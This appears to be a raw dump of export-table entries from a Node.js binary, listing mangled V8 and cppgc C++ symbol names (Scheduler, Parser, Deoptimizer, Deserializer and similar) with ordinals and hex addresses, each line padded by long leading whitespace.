                                                                                                                                                                                                                                    ?DecrementUnscheduledUseCount@Scheduler@compiler@internal@v8@@AEAAXPEAVNode@234@0@Z51080x1411d7fe0
                                                                                                                                                                                                                                    ?Default@AssemblerOptions@internal@v8@@SA?AU123@PEAVIsolate@23@@Z51090x140c0f080
                                                                                                                                                                                                                                    ?Default@MeasureMemoryDelegate@v8@@SA?AV?$unique_ptr@VMeasureMemoryDelegate@v8@@U?$default_delete@VMeasureMemoryDelegate@v8@@@std@@@std@@PEAVIsolate@2@V?$Local@VContext@v8@@@2@V?$Local@VResolver@Promise@v8@@@2@W4MeasureMemoryMode@2@@Z51100x140c7ff30
                                                                                                                                                                                                                                    ?Default@RegisterConfiguration@internal@v8@@SAPEBV123@XZ51110x140bdf4e0
                                                                                                                                                                                                                                    ?DefaultConstructor@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEBVAstRawString@23@_NHH@Z51120x1408bbd20
                                                                                                                                                                                                                                    ?DefaultForOffHeapTrampoline@AssemblerOptions@internal@v8@@SA?AU123@PEAVIsolate@23@@Z51130x140c0f100
                                                                                                                                                                                                                                    ?DefaultJSRegisterArray@CallInterfaceDescriptor@internal@v8@@KA?AV?$array@VRegister@internal@v8@@$03@std@@XZ51140x1405f7000
                                                                                                                                                                                                                                    ?DefaultLocale@Isolate@internal@v8@@QEAAAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ51150x140b67c00
                                                                                                                                                                                                                                    ?DefaultLocale@LocalIsolate@internal@v8@@QEAAAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ51160x140b5ffc0
                                                                                                                                                                                                                                    ?DefaultLowering@Int64Lowering@compiler@internal@v8@@AEAA_NPEAVNode@234@_N@Z51170x1410f0550
                                                                                                                                                                                                                                    ?DefaultNumberOption@internal@v8@@YA?AV?$Maybe@H@2@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@HHHV?$Handle@VString@internal@v8@@@12@@Z51180x1408fbf60
                                                                                                                                                                                                                                    ?DefaultProcessExitHandler@node@@YAXPEAVEnvironment@1@H@Z51190x14029de40
                                                                                                                                                                                                                                    ?DefaultRegisterArray@CallInterfaceDescriptor@internal@v8@@KA@XZ51200x1405f7010
                                                                                                                                                                                                                                    ?DefaultRepresentation@InstructionSequence@compiler@internal@v8@@SA?AW4MachineRepresentation@34@XZ51210x14057eb60
                                                                                                                                                                                                                                    ?DefaultSchedulerData@Scheduler@compiler@internal@v8@@AEAA?AUSchedulerData@1234@XZ51220x1411d8180
                                                                                                                                                                                                                                    ?DeferTraceToMutatorThreadIfConcurrent@ConcurrentMarkingVisitor@internal@cppgc@@MEAA_NPEBXP6AXPEAVVisitor@3@0@Z_K@Z51230x14050f2a0
                                                                                                                                                                                                                                    ?DeferTraceToMutatorThreadIfConcurrent@ConcurrentUnifiedHeapMarkingVisitor@internal@v8@@MEAA_NPEBXP6AXPEAVVisitor@cppgc@@0@Z_K@Z51240x14050f2a0
                                                                                                                                                                                                                                    ?DeferTraceToMutatorThreadIfConcurrent@Visitor@cppgc@@UEAA_NPEBXP6AXPEAV12@0@Z_K@Z51250x140098380
                                                                                                                                                                                                                                    ?DefineAccessor@JSObject@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@V?$Handle@VJSObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2W4PropertyAttributes@23@@Z51260x14095c2e0
                                                                                                                                                                                                                                    ?DefineDeoptimizationLiteral@CodeGenerator@compiler@internal@v8@@AEAAHVDeoptimizationLiteral@234@@Z51270x14106d2f0
                                                                                                                                                                                                                                    ?DefineKeyedOwnProperty@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@0H@Z51280x140a5d990
                                                                                                                                                                                                                                    ?DefineKeyedOwnProperty@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4LanguageMode@34@AEBUFeedbackSource@234@@Z51290x1410c4090
                                                                                                                                                                                                                                    ?DefineKeyedOwnPropertyInLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@0V?$Flags@W4DefineKeyedOwnPropertyInLiteralFlag@internal@v8@@H@base@4@H@Z51300x140a5d9b0
                                                                                                                                                                                                                                    ?DefineKeyedOwnPropertyInLiteral@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z51310x1410c4160
                                                                                                                                                                                                                                    ?DefineNamedOwnIC@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z51320x140c0d440
                                                                                                                                                                                                                                    ?DefineNamedOwnICInOptimizedCode@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z51330x140c0d460
                                                                                                                                                                                                                                    ?DefineNamedOwnProperty@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@PEBVAstRawString@34@H@Z51340x140a5d9d0
                                                                                                                                                                                                                                    ?DefineNamedOwnProperty@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVNameRef@234@AEBUFeedbackSource@234@@Z51350x1410c4220
                                                                                                                                                                                                                                    ?DefineObjectOwnProperty@Runtime@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@11W4StoreOrigin@23@V?$Maybe@W4ShouldThrow@internal@v8@@@3@@Z51360x14080e300
                                                                                                                                                                                                                                    ?DefineOwnProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@V?$Local@VValue@v8@@@2@W4PropertyAttribute@2@@Z51370x140c7ffd0
                                                                                                                                                                                                                                    ?DefineProperty@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VName@v8@@@2@AEAVPropertyDescriptor@2@@Z51380x140c80230
                                                                                                                                                                                                                                    ?DefinePropertyOrElementIgnoreAttributes@JSObject@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@V?$Handle@VJSObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z51390x14095d0f0
                                                                                                                                                                                                                                    ?Deinit@Isolate@internal@v8@@AEAAXXZ51400x140b67ed0
                                                                                                                                                                                                                                    ?Delay@Recorder@metrics@internal@v8@@AEAAX$$QEAV?$unique_ptr@VDelayedEventBase@Recorder@metrics@internal@v8@@U?$default_delete@VDelayedEventBase@Recorder@metrics@internal@v8@@@std@@@std@@@Z51410x140a0dd50
                                                                                                                                                                                                                                    ?DelayedStringConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBVStringConstantBase@34@@Z51420x141039b00
                                                                                                                                                                                                                                    ?Delete@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SA_NPEAVIsolate@23@VOrderedHashMap@23@VObject@23@@Z51430x1408f9140
                                                                                                                                                                                                                                    ?Delete@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SA_NPEAVIsolate@23@VOrderedHashSet@23@VObject@23@@Z51440x1408f92d0
                                                                                                                                                                                                                                    ?Delete@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@SA_NPEAVIsolate@23@VOrderedNameDictionary@23@VObject@23@@Z51450x1408f9440
                                                                                                                                                                                                                                    ?Delete@?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z51460x1408f9620
                                                                                                                                                                                                                                    ?Delete@?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z51470x1408f9650
                                                                                                                                                                                                                                    ?Delete@?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z51480x1408f9680
                                                                                                                                                                                                                                    ?Delete@?$SmallOrderedHashTable@VSmallOrderedHashMap@internal@v8@@@internal@v8@@SA_NPEAVIsolate@23@VSmallOrderedHashMap@23@VObject@23@@Z51490x1408f96b0
                                                                                                                                                                                                                                    ?Delete@?$SmallOrderedHashTable@VSmallOrderedHashSet@internal@v8@@@internal@v8@@SA_NPEAVIsolate@23@VSmallOrderedHashSet@23@VObject@23@@Z51500x1408f9890
                                                                                                                                                                                                                                    ?Delete@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@W4LanguageMode@34@@Z51510x140a5da20
                                                                                                                                                                                                                                    ?Delete@CpuProfile@v8@@QEAAXXZ51520x140c80380
                                                                                                                                                                                                                                    ?Delete@HeapSnapshot@v8@@QEAAXXZ51530x140c80390
                                                                                                                                                                                                                                    ?Delete@Isolate@internal@v8@@SAXPEAV123@@Z51540x140b683c0
                                                                                                                                                                                                                                    ?Delete@LookupIterator@internal@v8@@QEAAXXZ51550x140933390
                                                                                                                                                                                                                                    ?Delete@Map@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z51560x140c80400
                                                                                                                                                                                                                                    ?Delete@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@I@Z51570x140c805e0
                                                                                                                                                                                                                                    ?Delete@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z51580x140c80740
                                                                                                                                                                                                                                    ?Delete@Set@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z51590x140c80970
                                                                                                                                                                                                                                    ?Delete@SmallOrderedHashMap@internal@v8@@SA_NPEAVIsolate@23@V123@VObject@23@@Z51600x1408f9b80
                                                                                                                                                                                                                                    ?Delete@SmallOrderedHashSet@internal@v8@@SA_NPEAVIsolate@23@V123@VObject@23@@Z51610x1408f9b90
                                                                                                                                                                                                                                    ?DeleteAll@Zone@internal@v8@@AEAAXXZ51620x1407ae360
                                                                                                                                                                                                                                    ?DeleteAllHeapSnapshots@HeapProfiler@v8@@QEAAXXZ51630x140c80b50
                                                                                                                                                                                                                                    ?DeleteAllProfiles@CpuProfiler@internal@v8@@QEAAXXZ51640x14087b500
                                                                                                                                                                                                                                    ?DeleteCodeAfter@WasmFunctionBuilder@wasm@internal@v8@@QEAAX_K@Z51650x140634750
                                                                                                                                                                                                                                    ?DeleteCompileJobsOnContext@WasmEngine@wasm@internal@v8@@QEAAXV?$Handle@VContext@internal@v8@@@34@@Z51660x14064bea0
                                                                                                                                                                                                                                    ?DeleteCompileJobsOnIsolate@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@@Z51670x14064c110
                                                                                                                                                                                                                                    ?DeleteEntry@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z51680x14090c1b0
                                                                                                                                                                                                                                    ?DeleteEntry@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z51690x14090c260
                                                                                                                                                                                                                                    ?DeleteEntry@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z51700x14090c320
                                                                                                                                                                                                                                    ?DeleteEntry@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z51710x14090c3e0
                                                                                                                                                                                                                                    ?DeleteEntry@IdentityMapBase@internal@v8@@IEAA_N_KPEA_K@Z51720x1407bb5c0
                                                                                                                                                                                                                                    ?DeleteEntry@OrderedNameDictionary@internal@v8@@SA?AV?$Handle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z51730x1408f9ba0
                                                                                                                                                                                                                                    ?DeleteEntry@OrderedNameDictionaryHandler@internal@v8@@SA?AV?$Handle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z51740x1408f9c70
                                                                                                                                                                                                                                    ?DeleteEntry@SmallOrderedNameDictionary@internal@v8@@SA?AV?$Handle@VSmallOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z51750x1408f9cc0
                                                                                                                                                                                                                                    ?DeleteEntry@SwissNameDictionary@internal@v8@@SA?AV?$Handle@VSwissNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@VInternalIndex@23@@Z51760x1408d8b20
                                                                                                                                                                                                                                    ?DeleteExtensions@HandleScope@internal@v8@@SAXPEAVIsolate@23@@Z51770x140b4b0d0
                                                                                                                                                                                                                                    ?DeleteIndex@IdentityMapBase@internal@v8@@AEAA_NHPEA_K@Z51780x1407bb620
                                                                                                                                                                                                                                    ?DeleteJob@LazyCompileDispatcher@internal@v8@@AEAAXPEAUJob@123@@Z51790x140bd8e50
                                                                                                                                                                                                                                    ?DeleteJob@LazyCompileDispatcher@internal@v8@@AEAAXPEAUJob@123@AEBV?$LockGuard@VMutex@base@v8@@$0A@@base@3@@Z51800x140bd8ee0
                                                                                                                                                                                                                                    ?DeleteObjectProperty@Runtime@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4LanguageMode@23@@Z51810x14080e4e0
                                                                                                                                                                                                                                    ?DeletePrivate@Object@v8@@QEAA?AV?$Maybe@_N@2@V?$Local@VContext@v8@@@2@V?$Local@VPrivate@v8@@@2@@Z51820x140c80b60
                                                                                                                                                                                                                                    ?DeleteProfile@CpuProfiler@internal@v8@@QEAAXPEAVCpuProfile@23@@Z51830x14087b530
                                                                                                                                                                                                                                    ?DeleteProperty@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ51840x1410c42f0
                                                                                                                                                                                                                                    ?DeleteProperty@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@W4LanguageMode@23@@Z51850x14095dc80
                                                                                                                                                                                                                                    ?DeletePropertyOrElement@JSReceiver@internal@v8@@SA?AV?$Maybe@_N@3@V?$Handle@VJSReceiver@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@W4LanguageMode@23@@Z51860x14095dd00
                                                                                                                                                                                                                                    ?DeleteThreadLocalKey@Thread@base@v8@@SAXH@Z51870x140ff3ab0
                                                                                                                                                                                                                                    ?DeleteUnresolved@Scope@internal@v8@@QEAAXPEAVVariableProxy@23@@Z51880x140c64b80
                                                                                                                                                                                                                                    ?Deoptimize@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@@Z51890x141039ba0
                                                                                                                                                                                                                                    ?DeoptimizeAll@Deoptimizer@internal@v8@@SAXPEAVIsolate@23@@Z51900x140bab470
                                                                                                                                                                                                                                    ?DeoptimizeFunction@Debug@internal@v8@@QEAAXV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z51910x140bb8ff0
                                                                                                                                                                                                                                    ?DeoptimizeIf@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@@Z51920x141039cf0
                                                                                                                                                                                                                                    ?DeoptimizeIf@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@PEAV5234@2@Z51930x1410e23d0
                                                                                                                                                                                                                                    ?DeoptimizeIfNot@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@PEAV5234@2@Z51940x1410e2470
                                                                                                                                                                                                                                    ?DeoptimizeReasonToString@internal@v8@@YAPEBDW4DeoptimizeReason@12@@Z51950x140bb0a90
                                                                                                                                                                                                                                    ?DeoptimizeUnless@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@@Z51960x141039e70
                                                                                                                                                                                                                                    ?DependOnArrayBufferDetachingProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ51970x1410bc5f0
                                                                                                                                                                                                                                    ?DependOnArrayIteratorProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ51980x1410bc650
                                                                                                                                                                                                                                    ?DependOnArraySpeciesProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ51990x1410bc6b0
                                                                                                                                                                                                                                    ?DependOnConsistentJSFunctionView@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVJSFunctionRef@234@@Z52000x1410bc710
                                                                                                                                                                                                                                    ?DependOnConstantInDictionaryPrototypeChain@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVMapRef@234@AEBVNameRef@234@AEBVObjectRef@234@W4PropertyKind@34@@Z52010x1410bc790
                                                                                                                                                                                                                                    ?DependOnElementsKind@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVAllocationSiteRef@234@@Z52020x1410bc840
                                                                                                                                                                                                                                    ?DependOnElementsKinds@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVAllocationSiteRef@234@@Z52030x1410bc930
                                                                                                                                                                                                                                    ?DependOnFieldConstness@CompilationDependencies@compiler@internal@v8@@QEAA?AW4PropertyConstness@34@AEBVMapRef@234@VInternalIndex@34@@Z52040x1410bcaa0
                                                                                                                                                                                                                                    ?DependOnGlobalProperty@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVPropertyCellRef@234@@Z52050x1410bcba0
                                                                                                                                                                                                                                    ?DependOnInitialMap@CompilationDependencies@compiler@internal@v8@@QEAA?AVMapRef@234@AEBVJSFunctionRef@234@@Z52060x1410bcc70
                                                                                                                                                                                                                                    ?DependOnInitialMapInstanceSizePrediction@CompilationDependencies@compiler@internal@v8@@QEAA?AVSlackTrackingPrediction@234@AEBVJSFunctionRef@234@@Z52070x1410bcd10
                                                                                                                                                                                                                                    ?DependOnNoElementsProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ52080x1410bce90
                                                                                                                                                                                                                                    ?DependOnOwnConstantDataProperty@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVJSObjectRef@234@AEBVMapRef@234@VRepresentation@34@VFieldIndex@34@AEBVObjectRef@234@@Z52090x1410bcef0
                                                                                                                                                                                                                                    ?DependOnOwnConstantDictionaryProperty@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVJSObjectRef@234@VInternalIndex@34@AEBVObjectRef@234@@Z52100x1410bcfc0
                                                                                                                                                                                                                                    ?DependOnOwnConstantElement@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVJSObjectRef@234@IAEBVObjectRef@234@@Z52110x1410bd080
                                                                                                                                                                                                                                    ?DependOnPretenureMode@CompilationDependencies@compiler@internal@v8@@QEAA?AW4AllocationType@34@AEBVAllocationSiteRef@234@@Z52120x1410bd130
                                                                                                                                                                                                                                    ?DependOnPromiseHookProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ52130x1410bd1e0
                                                                                                                                                                                                                                    ?DependOnPromiseSpeciesProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ52140x1410bd240
                                                                                                                                                                                                                                    ?DependOnPromiseThenProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ52150x1410bd2a0
                                                                                                                                                                                                                                    ?DependOnProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NAEBVPropertyCellRef@234@@Z52160x1410bd300
                                                                                                                                                                                                                                    ?DependOnPrototypeProperty@CompilationDependencies@compiler@internal@v8@@QEAA?AVObjectRef@234@AEBVJSFunctionRef@234@@Z52170x1410bd3d0
                                                                                                                                                                                                                                    ?DependOnStableMap@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVMapRef@234@@Z52180x1410bd470
                                                                                                                                                                                                                                    ?DependOnStablePrototypeChains@CompilationDependencies@compiler@internal@v8@@QEAAXAEBV?$ZoneVector@VMapRef@compiler@internal@v8@@@34@W4WhereToStart@34@V?$Optional@VJSObjectRef@compiler@internal@v8@@@base@4@@Z52190x1410bd500
                                                                                                                                                                                                                                    ?Description@Symbol@v8@@QEBA?AV?$Local@VValue@v8@@@2@PEAVIsolate@2@@Z52200x140c80d40
                                                                                                                                                                                                                                    ?Deserialize@ContextDeserializer@internal@v8@@AEAA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSGlobalProxy@internal@v8@@@23@UDeserializeInternalFieldsCallback@3@@Z52210x1407ed6a0
                                                                                                                                                                                                                                    ?Deserialize@WebSnapshotDeserializer@internal@v8@@QEAA_NV?$MaybeHandle@VFixedArray@internal@v8@@@23@_N@Z52220x1407aff20
                                                                                                                                                                                                                                    ?DeserializeArrays@WebSnapshotDeserializer@internal@v8@@AEAAXXZ52230x1407b0100
                                                                                                                                                                                                                                    ?DeserializeClasses@WebSnapshotDeserializer@internal@v8@@AEAAXXZ52240x1407b0590
                                                                                                                                                                                                                                    ?DeserializeContext@ContextDeserializer@internal@v8@@SA?AV?$MaybeHandle@VContext@internal@v8@@@23@PEAVIsolate@23@PEBVSnapshotData@23@_NV?$Handle@VJSGlobalProxy@internal@v8@@@23@UDeserializeInternalFieldsCallback@3@@Z52250x1407ed7d0
                                                                                                                                                                                                                                    ?DeserializeContexts@WebSnapshotDeserializer@internal@v8@@AEAAXXZ52260x1407b0b30
                                                                                                                                                                                                                                    ?DeserializeDeferredObjects@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@IEAAXXZ52270x1407e9e60
                                                                                                                                                                                                                                    ?DeserializeDeferredObjects@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@IEAAXXZ52280x1407e9ed0
                                                                                                                                                                                                                                    ?DeserializeEmbedderFields@ContextDeserializer@internal@v8@@AEAAXUDeserializeInternalFieldsCallback@3@@Z52290x1407ed990
                                                                                                                                                                                                                                    ?DeserializeExports@WebSnapshotDeserializer@internal@v8@@AEAAX_N@Z52300x1407b1480
                                                                                                                                                                                                                                    ?DeserializeFunctions@WebSnapshotDeserializer@internal@v8@@AEAAXXZ52310x1407b1930
                                                                                                                                                                                                                                    ?DeserializeMaps@WebSnapshotDeserializer@internal@v8@@AEAAXXZ52320x1407b1f20
                                                                                                                                                                                                                                    ?DeserializeNativeModule@wasm@internal@v8@@YA?AV?$MaybeHandle@VWasmModuleObject@internal@v8@@@23@PEAVIsolate@23@V?$Vector@$$CBE@base@3@1V?$Vector@$$CBD@73@@Z52330x14061d3c0
                                                                                                                                                                                                                                    ?DeserializeObjects@WebSnapshotDeserializer@internal@v8@@AEAAXXZ52340x1407b2720
                                                                                                                                                                                                                                    ?DeserializeReceiver@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z52350x140c64b90
                                                                                                                                                                                                                                    ?DeserializeScript@WebSnapshotDeserializer@internal@v8@@AEAA_NXZ52360x1407b2f70
                                                                                                                                                                                                                                    ?DeserializeSnapshot@WebSnapshotDeserializer@internal@v8@@AEAA_N_N@Z52370x1407b3130
                                                                                                                                                                                                                                    ?DeserializeStrings@WebSnapshotDeserializer@internal@v8@@AEAAXXZ52380x1407b32c0
                                                                                                                                                                                                                                    ?Destroy@BasePage@internal@cppgc@@SAXPEAV123@@Z52390x14051a250
                                                                                                                                                                                                                                    ?Destroy@GlobalHandles@internal@v8@@SAXPEA_K@Z52400x140b4cbe0
                                                                                                                                                                                                                                    ?Destroy@LargePage@internal@cppgc@@SAXPEAV123@@Z52410x14051a2e0
                                                                                                                                                                                                                                    ?Destroy@NormalPage@internal@cppgc@@SAXPEAV123@@Z52420x14051a320
                                                                                                                                                                                                                                    ?DestroySharedMemoryHandle@OS@base@v8@@SAX_J@Z52430x140ff3ac0
                                                                                                                                                                                                                                    ?DestroyTracedReference@GlobalHandles@internal@v8@@SAXPEA_K@Z52440x140b4cbf0
                                                                                                                                                                                                                                    ?DesugarBindingInForEachStatement@Parser@internal@v8@@AEAAXPEAUForInfo@?$ParserBase@VParser@internal@v8@@@23@PEAPEAVBlock@23@PEAPEAVExpression@23@@Z52450x1408bc090
                                                                                                                                                                                                                                    ?DesugarLexicalBindingsInForStatement@Parser@internal@v8@@AEAAPEAVStatement@23@PEAVForStatement@23@PEAV423@PEAVExpression@23@11PEAVScope@23@AEBUForInfo@?$ParserBase@VParser@internal@v8@@@23@@Z52460x1408bc290
                                                                                                                                                                                                                                    ?Detach@ArrayBuffer@v8@@QEAAXXZ52470x140c80db0
                                                                                                                                                                                                                                    ?Detach@JSArrayBuffer@internal@v8@@QEAAX_N@Z52480x140998060
                                                                                                                                                                                                                                    ?Detach@PersistentHandlesScope@internal@v8@@QEAA?AV?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@XZ52490x140b4a850
                                                                                                                                                                                                                                    ?DetachAt@LiveRange@compiler@internal@v8@@QEAAPEAVUsePosition@234@VLifetimePosition@234@PEAV1234@PEAVZone@34@W4HintConnectionOption@1234@@Z52500x14110d3f0
                                                                                                                                                                                                                                    ?DetachCanonicalHandles@CanonicalHandleScope@internal@v8@@IEAA?AV?$unique_ptr@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@U?$default_delete@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@@std@@@std@@XZ52510x140b4b160
                                                                                                                                                                                                                                    ?DetachCanonicalHandles@JSHeapBroker@compiler@internal@v8@@AEAA?AV?$unique_ptr@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@U?$default_delete@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@@std@@@std@@XZ52520x141017570
                                                                                                                                                                                                                                    ?DetachCanonicalHandles@OptimizedCompilationInfo@internal@v8@@QEAA?AV?$unique_ptr@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@U?$default_delete@V?$IdentityMap@PEA_KVZoneAllocationPolicy@internal@v8@@@internal@v8@@@std@@@std@@XZ52530x14053ec60
                                                                                                                                                                                                                                    ?DetachCppHeap@Heap@internal@v8@@QEAAXXZ52540x140b030f0
                                                                                                                                                                                                                                    ?DetachCppHeap@Isolate@v8@@QEAAXXZ52550x140c80e70
                                                                                                                                                                                                                                    ?DetachFromSharedIsolate@Isolate@internal@v8@@AEAAXXZ52560x140b684a0
                                                                                                                                                                                                                                    ?DetachGlobal@Context@v8@@QEAAXXZ52570x140c80e80
                                                                                                                                                                                                                                    ?DetachGlobal@Isolate@internal@v8@@QEAAXV?$Handle@VContext@internal@v8@@@23@@Z52580x140b684e0
                                                                                                                                                                                                                                    ?DetachIsolate@CppHeap@internal@v8@@QEAAXXZ52590x140b3f3d0
                                                                                                                                                                                                                                    ?DetachLocalIsolate@JSHeapBroker@compiler@internal@v8@@QEAAXPEAVOptimizedCompilationInfo@34@@Z52600x1410b6d10
                                                                                                                                                                                                                                    ?DetachPersistentHandles@JSHeapBroker@compiler@internal@v8@@AEAA?AV?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@XZ52610x141017590
                                                                                                                                                                                                                                    ?DetachPersistentHandles@LocalHeap@internal@v8@@QEAA?AV?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@XZ52620x140af1b80
                                                                                                                                                                                                                                    ?DetachPersistentHandles@OptimizedCompilationInfo@internal@v8@@QEAA?AV?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@XZ52630x14053ec80
                                                                                                                                                                                                                                    ?DetailsAt@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z52640x14053eca0
                                                                                                                                                                                                                                    ?DetailsAt@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z52650x14053ecd0
                                                                                                                                                                                                                                    ?DetailsAt@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z52660x14090c7e0
                                                                                                                                                                                                                                    ?DetailsAt@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z52670x14090c800
                                                                                                                                                                                                                                    ?DetailsAt@OrderedNameDictionary@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z52680x14053ed00
